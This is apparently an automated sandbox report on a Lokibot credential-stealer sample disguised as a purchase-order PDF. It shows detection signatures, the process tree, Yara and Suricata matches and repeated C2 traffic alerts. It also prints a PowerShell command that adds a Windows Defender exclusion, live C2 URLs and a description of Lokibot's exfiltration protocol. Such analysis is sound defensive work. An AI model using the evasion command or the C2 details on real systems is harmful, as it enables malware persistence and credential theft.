Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ADES_PO_Confirmation_20250307_pdf.bat.exe

Overview

General Information

Sample name:ADES_PO_Confirmation_20250307_pdf.bat.exe
Analysis ID:1638106
MD5:1714930e93d8458a2de4792fc3e54551
SHA1:1117c156f9c69ceed004451ffe37f0059887c2cf
SHA256:7cab67f3270d22af388a715bc460f69be5f200da4576be5940c190a008a2e765
Tags:exeuser-threatcat_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • ADES_PO_Confirmation_20250307_pdf.bat.exe (PID: 8032 cmdline: "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe" MD5: 1714930E93D8458A2DE4792FC3E54551)
    • powershell.exe (PID: 6836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8288 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x18108:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x54d3:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 30 entries
          SourceRuleDescriptionAuthorStrings
          0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
            • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
            0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpackLoki_1Loki Payloadkevoreilly
            • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
            • 0x133fc:$a2: last_compatible_version
            0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
            • 0x123ff:$des3: 68 03 66 00 00
            • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
            • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
            Click to see the 37 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe, ParentProcessId: 8032, ParentProcessName: ADES_PO_Confirmation_20250307_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", ProcessId: 6836, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe, ParentProcessId: 8032, ParentProcessName: ADES_PO_Confirmation_20250307_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", ProcessId: 6836, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", ParentImage: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe, ParentProcessId: 8032, ParentProcessName: ADES_PO_Confirmation_20250307_pdf.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exe", ProcessId: 6836, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:04:03.639481+010020243121A Network Trojan was detected192.168.2.549714104.21.96.180TCP
            2025-03-14T08:04:05.939230+010020243121A Network Trojan was detected192.168.2.549715104.21.96.180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:04:02.916203+010020253811Malware Command and Control Activity Detected192.168.2.549714104.21.96.180TCP
            2025-03-14T08:04:05.008562+010020253811Malware Command and Control Activity Detected192.168.2.549715104.21.96.180TCP
            2025-03-14T08:04:06.038405+010020253811Malware Command and Control Activity Detected192.168.2.549716104.21.96.180TCP
            2025-03-14T08:04:08.103422+010020253811Malware Command and Control Activity Detected192.168.2.549717104.21.96.180TCP
            2025-03-14T08:04:10.335761+010020253811Malware Command and Control Activity Detected192.168.2.549718104.21.96.180TCP
            2025-03-14T08:04:12.257051+010020253811Malware Command and Control Activity Detected192.168.2.549719104.21.96.180TCP
            2025-03-14T08:04:14.415132+010020253811Malware Command and Control Activity Detected192.168.2.549720104.21.96.180TCP
            2025-03-14T08:04:16.401705+010020253811Malware Command and Control Activity Detected192.168.2.549729104.21.96.180TCP
            2025-03-14T08:04:18.432261+010020253811Malware Command and Control Activity Detected192.168.2.549733104.21.96.180TCP
            2025-03-14T08:04:20.340213+010020253811Malware Command and Control Activity Detected192.168.2.549734104.21.96.180TCP
            2025-03-14T08:04:22.237786+010020253811Malware Command and Control Activity Detected192.168.2.549735104.21.96.180TCP
            2025-03-14T08:04:24.194250+010020253811Malware Command and Control Activity Detected192.168.2.549736104.21.96.180TCP
            2025-03-14T08:04:26.179170+010020253811Malware Command and Control Activity Detected192.168.2.549737104.21.96.180TCP
            2025-03-14T08:04:28.241875+010020253811Malware Command and Control Activity Detected192.168.2.549738104.21.96.180TCP
            2025-03-14T08:04:30.156668+010020253811Malware Command and Control Activity Detected192.168.2.549739104.21.96.180TCP
            2025-03-14T08:04:32.038450+010020253811Malware Command and Control Activity Detected192.168.2.549740104.21.96.180TCP
            2025-03-14T08:04:34.257427+010020253811Malware Command and Control Activity Detected192.168.2.549741104.21.96.180TCP
            2025-03-14T08:04:36.332008+010020253811Malware Command and Control Activity Detected192.168.2.549742104.21.96.180TCP
            2025-03-14T08:04:38.352374+010020253811Malware Command and Control Activity Detected192.168.2.549743104.21.96.180TCP
            2025-03-14T08:04:40.274342+010020253811Malware Command and Control Activity Detected192.168.2.549744104.21.96.180TCP
            2025-03-14T08:04:42.251113+010020253811Malware Command and Control Activity Detected192.168.2.549745104.21.96.180TCP
            2025-03-14T08:04:44.354305+010020253811Malware Command and Control Activity Detected192.168.2.549746104.21.96.180TCP
            2025-03-14T08:04:46.417062+010020253811Malware Command and Control Activity Detected192.168.2.549747104.21.96.180TCP
            2025-03-14T08:04:48.333985+010020253811Malware Command and Control Activity Detected192.168.2.549748104.21.96.180TCP
            2025-03-14T08:04:50.287569+010020253811Malware Command and Control Activity Detected192.168.2.549749104.21.96.180TCP
            2025-03-14T08:04:52.243075+010020253811Malware Command and Control Activity Detected192.168.2.549758104.21.96.180TCP
            2025-03-14T08:04:54.146249+010020253811Malware Command and Control Activity Detected192.168.2.549759104.21.96.180TCP
            2025-03-14T08:04:56.102444+010020253811Malware Command and Control Activity Detected192.168.2.549760104.21.96.180TCP
            2025-03-14T08:04:58.093741+010020253811Malware Command and Control Activity Detected192.168.2.549761104.21.96.180TCP
            2025-03-14T08:04:59.986075+010020253811Malware Command and Control Activity Detected192.168.2.549762104.21.96.180TCP
            2025-03-14T08:05:01.959496+010020253811Malware Command and Control Activity Detected192.168.2.549763104.21.96.180TCP
            2025-03-14T08:05:03.755118+010020253811Malware Command and Control Activity Detected192.168.2.549764104.21.96.180TCP
            2025-03-14T08:05:05.639399+010020253811Malware Command and Control Activity Detected192.168.2.549765104.21.96.180TCP
            2025-03-14T08:05:07.475369+010020253811Malware Command and Control Activity Detected192.168.2.549766104.21.96.180TCP
            2025-03-14T08:05:09.350193+010020253811Malware Command and Control Activity Detected192.168.2.549767104.21.96.180TCP
            2025-03-14T08:05:11.272633+010020253811Malware Command and Control Activity Detected192.168.2.549768104.21.96.180TCP
            2025-03-14T08:05:13.224983+010020253811Malware Command and Control Activity Detected192.168.2.549769104.21.96.180TCP
            2025-03-14T08:05:15.225029+010020253811Malware Command and Control Activity Detected192.168.2.549770104.21.96.180TCP
            2025-03-14T08:05:17.161078+010020253811Malware Command and Control Activity Detected192.168.2.549771104.21.96.180TCP
            2025-03-14T08:05:19.068020+010020253811Malware Command and Control Activity Detected192.168.2.549772104.21.96.180TCP
            2025-03-14T08:05:20.881685+010020253811Malware Command and Control Activity Detected192.168.2.549773104.21.96.180TCP
            2025-03-14T08:05:22.741187+010020253811Malware Command and Control Activity Detected192.168.2.549774104.21.96.180TCP
            2025-03-14T08:05:24.557370+010020253811Malware Command and Control Activity Detected192.168.2.549775104.21.96.180TCP
            2025-03-14T08:05:26.335460+010020253811Malware Command and Control Activity Detected192.168.2.549776104.21.96.180TCP
            2025-03-14T08:05:28.224730+010020253811Malware Command and Control Activity Detected192.168.2.549777104.21.96.180TCP
            2025-03-14T08:05:30.179950+010020253811Malware Command and Control Activity Detected192.168.2.549778104.21.96.180TCP
            2025-03-14T08:05:32.038264+010020253811Malware Command and Control Activity Detected192.168.2.549779104.21.96.180TCP
            2025-03-14T08:05:33.902856+010020253811Malware Command and Control Activity Detected192.168.2.549780104.21.96.180TCP
            2025-03-14T08:05:35.835149+010020253811Malware Command and Control Activity Detected192.168.2.549781104.21.96.180TCP
            2025-03-14T08:05:37.812176+010020253811Malware Command and Control Activity Detected192.168.2.549782104.21.96.180TCP
            2025-03-14T08:05:39.723929+010020253811Malware Command and Control Activity Detected192.168.2.549783104.21.96.180TCP
            2025-03-14T08:05:41.621705+010020253811Malware Command and Control Activity Detected192.168.2.549784104.21.96.180TCP
            2025-03-14T08:05:43.584447+010020253811Malware Command and Control Activity Detected192.168.2.549785104.21.96.180TCP
            2025-03-14T08:05:45.443904+010020253811Malware Command and Control Activity Detected192.168.2.549786104.21.96.180TCP
            2025-03-14T08:05:47.398042+010020253811Malware Command and Control Activity Detected192.168.2.549787104.21.96.180TCP
            2025-03-14T08:05:49.214195+010020253811Malware Command and Control Activity Detected192.168.2.549788104.21.96.180TCP
            2025-03-14T08:05:51.179112+010020253811Malware Command and Control Activity Detected192.168.2.549789104.21.96.180TCP
            2025-03-14T08:05:53.072496+010020253811Malware Command and Control Activity Detected192.168.2.549790104.21.96.180TCP
            2025-03-14T08:05:54.991851+010020253811Malware Command and Control Activity Detected192.168.2.549791104.21.96.180TCP
            2025-03-14T08:05:56.803930+010020253811Malware Command and Control Activity Detected192.168.2.549792104.21.96.180TCP
            2025-03-14T08:05:58.709657+010020253811Malware Command and Control Activity Detected192.168.2.549793104.21.96.180TCP
            2025-03-14T08:06:00.649042+010020253811Malware Command and Control Activity Detected192.168.2.549794104.21.96.180TCP
            2025-03-14T08:06:02.647337+010020253811Malware Command and Control Activity Detected192.168.2.549795104.21.96.180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:04:06.953031+010020254831A Network Trojan was detected104.21.96.180192.168.2.549716TCP
            2025-03-14T08:04:09.035168+010020254831A Network Trojan was detected104.21.96.180192.168.2.549717TCP
            2025-03-14T08:04:13.263883+010020254831A Network Trojan was detected104.21.96.180192.168.2.549719TCP
            2025-03-14T08:04:23.032283+010020254831A Network Trojan was detected104.21.96.180192.168.2.549735TCP
            2025-03-14T08:04:27.075773+010020254831A Network Trojan was detected104.21.96.180192.168.2.549737TCP
            2025-03-14T08:04:32.936914+010020254831A Network Trojan was detected104.21.96.180192.168.2.549740TCP
            2025-03-14T08:04:35.168441+010020254831A Network Trojan was detected104.21.96.180192.168.2.549741TCP
            2025-03-14T08:04:37.178170+010020254831A Network Trojan was detected104.21.96.180192.168.2.549742TCP
            2025-03-14T08:04:43.210092+010020254831A Network Trojan was detected104.21.96.180192.168.2.549745TCP
            2025-03-14T08:04:45.194233+010020254831A Network Trojan was detected104.21.96.180192.168.2.549746TCP
            2025-03-14T08:04:54.929378+010020254831A Network Trojan was detected104.21.96.180192.168.2.549759TCP
            2025-03-14T08:04:56.915394+010020254831A Network Trojan was detected104.21.96.180192.168.2.549760TCP
            2025-03-14T08:05:00.813177+010020254831A Network Trojan was detected104.21.96.180192.168.2.549762TCP
            2025-03-14T08:05:02.611498+010020254831A Network Trojan was detected104.21.96.180192.168.2.549763TCP
            2025-03-14T08:05:06.272124+010020254831A Network Trojan was detected104.21.96.180192.168.2.549765TCP
            2025-03-14T08:05:12.066743+010020254831A Network Trojan was detected104.21.96.180192.168.2.549768TCP
            2025-03-14T08:05:14.065814+010020254831A Network Trojan was detected104.21.96.180192.168.2.549769TCP
            2025-03-14T08:05:17.937370+010020254831A Network Trojan was detected104.21.96.180192.168.2.549771TCP
            2025-03-14T08:05:19.724978+010020254831A Network Trojan was detected104.21.96.180192.168.2.549772TCP
            2025-03-14T08:05:23.378884+010020254831A Network Trojan was detected104.21.96.180192.168.2.549774TCP
            2025-03-14T08:05:25.185170+010020254831A Network Trojan was detected104.21.96.180192.168.2.549775TCP
            2025-03-14T08:05:27.102072+010020254831A Network Trojan was detected104.21.96.180192.168.2.549776TCP
            2025-03-14T08:05:29.022108+010020254831A Network Trojan was detected104.21.96.180192.168.2.549777TCP
            2025-03-14T08:05:32.683844+010020254831A Network Trojan was detected104.21.96.180192.168.2.549779TCP
            2025-03-14T08:05:34.703030+010020254831A Network Trojan was detected104.21.96.180192.168.2.549780TCP
            2025-03-14T08:05:36.657901+010020254831A Network Trojan was detected104.21.96.180192.168.2.549781TCP
            2025-03-14T08:05:38.578065+010020254831A Network Trojan was detected104.21.96.180192.168.2.549782TCP
            2025-03-14T08:05:48.057181+010020254831A Network Trojan was detected104.21.96.180192.168.2.549787TCP
            2025-03-14T08:05:51.899105+010020254831A Network Trojan was detected104.21.96.180192.168.2.549789TCP
            2025-03-14T08:05:55.649592+010020254831A Network Trojan was detected104.21.96.180192.168.2.549791TCP
            2025-03-14T08:05:59.500997+010020254831A Network Trojan was detected104.21.96.180192.168.2.549793TCP
            2025-03-14T08:06:01.505226+010020254831A Network Trojan was detected104.21.96.180192.168.2.549794TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-14T08:04:06.948352+010020243131Malware Command and Control Activity Detected192.168.2.549716104.21.96.180TCP
            2025-03-14T08:04:09.030420+010020243131Malware Command and Control Activity Detected192.168.2.549717104.21.96.180TCP
            2025-03-14T08:04:11.097818+010020243131Malware Command and Control Activity Detected192.168.2.549718104.21.96.180TCP
            2025-03-14T08:04:13.251797+010020243131Malware Command and Control Activity Detected192.168.2.549719104.21.96.180TCP
            2025-03-14T08:04:15.230928+010020243131Malware Command and Control Activity Detected192.168.2.549720104.21.96.180TCP
            2025-03-14T08:04:17.271174+010020243131Malware Command and Control Activity Detected192.168.2.549729104.21.96.180TCP
            2025-03-14T08:04:19.172389+010020243131Malware Command and Control Activity Detected192.168.2.549733104.21.96.180TCP
            2025-03-14T08:04:21.071736+010020243131Malware Command and Control Activity Detected192.168.2.549734104.21.96.180TCP
            2025-03-14T08:04:23.027586+010020243131Malware Command and Control Activity Detected192.168.2.549735104.21.96.180TCP
            2025-03-14T08:04:25.019090+010020243131Malware Command and Control Activity Detected192.168.2.549736104.21.96.180TCP
            2025-03-14T08:04:27.071127+010020243131Malware Command and Control Activity Detected192.168.2.549737104.21.96.180TCP
            2025-03-14T08:04:29.000854+010020243131Malware Command and Control Activity Detected192.168.2.549738104.21.96.180TCP
            2025-03-14T08:04:30.892521+010020243131Malware Command and Control Activity Detected192.168.2.549739104.21.96.180TCP
            2025-03-14T08:04:32.932195+010020243131Malware Command and Control Activity Detected192.168.2.549740104.21.96.180TCP
            2025-03-14T08:04:35.163690+010020243131Malware Command and Control Activity Detected192.168.2.549741104.21.96.180TCP
            2025-03-14T08:04:37.172766+010020243131Malware Command and Control Activity Detected192.168.2.549742104.21.96.180TCP
            2025-03-14T08:04:39.112090+010020243131Malware Command and Control Activity Detected192.168.2.549743104.21.96.180TCP
            2025-03-14T08:04:41.069109+010020243131Malware Command and Control Activity Detected192.168.2.549744104.21.96.180TCP
            2025-03-14T08:04:43.205332+010020243131Malware Command and Control Activity Detected192.168.2.549745104.21.96.180TCP
            2025-03-14T08:04:45.186148+010020243131Malware Command and Control Activity Detected192.168.2.549746104.21.96.180TCP
            2025-03-14T08:04:47.179148+010020243131Malware Command and Control Activity Detected192.168.2.549747104.21.96.180TCP
            2025-03-14T08:04:49.138809+010020243131Malware Command and Control Activity Detected192.168.2.549748104.21.96.180TCP
            2025-03-14T08:04:51.094367+010020243131Malware Command and Control Activity Detected192.168.2.549749104.21.96.180TCP
            2025-03-14T08:04:52.957086+010020243131Malware Command and Control Activity Detected192.168.2.549758104.21.96.180TCP
            2025-03-14T08:04:54.924722+010020243131Malware Command and Control Activity Detected192.168.2.549759104.21.96.180TCP
            2025-03-14T08:04:56.910645+010020243131Malware Command and Control Activity Detected192.168.2.549760104.21.96.180TCP
            2025-03-14T08:04:58.823489+010020243131Malware Command and Control Activity Detected192.168.2.549761104.21.96.180TCP
            2025-03-14T08:05:00.808516+010020243131Malware Command and Control Activity Detected192.168.2.549762104.21.96.180TCP
            2025-03-14T08:05:02.605775+010020243131Malware Command and Control Activity Detected192.168.2.549763104.21.96.180TCP
            2025-03-14T08:05:04.469262+010020243131Malware Command and Control Activity Detected192.168.2.549764104.21.96.180TCP
            2025-03-14T08:05:06.267383+010020243131Malware Command and Control Activity Detected192.168.2.549765104.21.96.180TCP
            2025-03-14T08:05:08.212190+010020243131Malware Command and Control Activity Detected192.168.2.549766104.21.96.180TCP
            2025-03-14T08:05:10.110336+010020243131Malware Command and Control Activity Detected192.168.2.549767104.21.96.180TCP
            2025-03-14T08:05:12.062052+010020243131Malware Command and Control Activity Detected192.168.2.549768104.21.96.180TCP
            2025-03-14T08:05:14.061062+010020243131Malware Command and Control Activity Detected192.168.2.549769104.21.96.180TCP
            2025-03-14T08:05:15.971192+010020243131Malware Command and Control Activity Detected192.168.2.549770104.21.96.180TCP
            2025-03-14T08:05:17.932698+010020243131Malware Command and Control Activity Detected192.168.2.549771104.21.96.180TCP
            2025-03-14T08:05:19.720340+010020243131Malware Command and Control Activity Detected192.168.2.549772104.21.96.180TCP
            2025-03-14T08:05:21.610866+010020243131Malware Command and Control Activity Detected192.168.2.549773104.21.96.180TCP
            2025-03-14T08:05:23.374189+010020243131Malware Command and Control Activity Detected192.168.2.549774104.21.96.180TCP
            2025-03-14T08:05:25.179855+010020243131Malware Command and Control Activity Detected192.168.2.549775104.21.96.180TCP
            2025-03-14T08:05:27.093941+010020243131Malware Command and Control Activity Detected192.168.2.549776104.21.96.180TCP
            2025-03-14T08:05:29.017374+010020243131Malware Command and Control Activity Detected192.168.2.549777104.21.96.180TCP
            2025-03-14T08:05:30.898637+010020243131Malware Command and Control Activity Detected192.168.2.549778104.21.96.180TCP
            2025-03-14T08:05:32.673225+010020243131Malware Command and Control Activity Detected192.168.2.549779104.21.96.180TCP
            2025-03-14T08:05:34.698292+010020243131Malware Command and Control Activity Detected192.168.2.549780104.21.96.180TCP
            2025-03-14T08:05:36.653240+010020243131Malware Command and Control Activity Detected192.168.2.549781104.21.96.180TCP
            2025-03-14T08:05:38.573339+010020243131Malware Command and Control Activity Detected192.168.2.549782104.21.96.180TCP
            2025-03-14T08:05:40.468518+010020243131Malware Command and Control Activity Detected192.168.2.549783104.21.96.180TCP
            2025-03-14T08:05:42.447749+010020243131Malware Command and Control Activity Detected192.168.2.549784104.21.96.180TCP
            2025-03-14T08:05:44.300083+010020243131Malware Command and Control Activity Detected192.168.2.549785104.21.96.180TCP
            2025-03-14T08:05:46.190609+010020243131Malware Command and Control Activity Detected192.168.2.549786104.21.96.180TCP
            2025-03-14T08:05:48.051303+010020243131Malware Command and Control Activity Detected192.168.2.549787104.21.96.180TCP
            2025-03-14T08:05:49.971664+010020243131Malware Command and Control Activity Detected192.168.2.549788104.21.96.180TCP
            2025-03-14T08:05:51.894461+010020243131Malware Command and Control Activity Detected192.168.2.549789104.21.96.180TCP
            2025-03-14T08:05:53.844925+010020243131Malware Command and Control Activity Detected192.168.2.549790104.21.96.180TCP
            2025-03-14T08:05:55.644864+010020243131Malware Command and Control Activity Detected192.168.2.549791104.21.96.180TCP
            2025-03-14T08:05:57.567979+010020243131Malware Command and Control Activity Detected192.168.2.549792104.21.96.180TCP
            2025-03-14T08:05:59.496372+010020243131Malware Command and Control Activity Detected192.168.2.549793104.21.96.180TCP
            2025-03-14T08:06:01.497952+010020243131Malware Command and Control Activity Detected192.168.2.549794104.21.96.180TCP
            2025-03-14T08:06:03.437464+010020243131Malware Command and Control Activity Detected192.168.2.549795104.21.96.180TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
